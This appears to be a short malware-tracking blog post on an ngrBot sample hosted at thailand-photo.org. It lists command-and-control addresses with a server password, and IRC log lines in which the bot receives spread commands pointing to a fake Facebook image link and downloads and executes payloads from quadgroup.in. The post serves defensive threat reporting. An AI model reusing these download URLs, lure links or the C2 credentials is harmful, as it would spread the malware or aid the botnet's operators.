thailand-photo.org(ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)

Remote Host Port Number
141.105.66.223 80
199.15.234.7 80
74.86.158.236 80
46.166.137.234 8282 PASS passwd

PRIVMSG #dork :[HTTP]: Updated HTTP spread interval to “3”
PRIVMSG #dork :[HTTP]: Updated HTTP spread message to “http://facebook-image.info/pic5436457564.jpg”
PRIVMSG #dork :[d=”http://quadgroup.in/lol/dl.exe” s=”151552 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0
PRIVMSG #dork :[d=”http://quadgroup.in/ngg.exe” s=”249856 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.exe” – Download retries: 0
NICK n{US|XPa}jgevkxv
USER jgevkxv 0 0 :jgevkxv
PONG :318D6AE5
JOIN #dork ngrBot
PRIVMSG #dork :[MSN]: Updated MSN spread interval to “5”
PRIVMSG #dork :[MSN]: Updated MSN spread message to “http://facebook-image.info/pic5436457564.jpg”

NICK n{US|XPa}dxthwku
USER dxthwku 0 0 :dxthwku
PONG :B13F34E1
JOIN #sprd ngrBot

* The data identified by the following URLs was then requested from the remote web server:
o http://ipvn6.com/dl/task.php?bid=4ed78c5700cd1a40&os=5-1-2600&uptime=0&rnd=154687
o http://api.wipmania.com/
o http://quadgroup.in/lol/dl.exe
o http://quadgroup.in/ngg.exe

hosting infos:
http://whois.domaintools.com/46.166.137.234

Categories: Uncategorized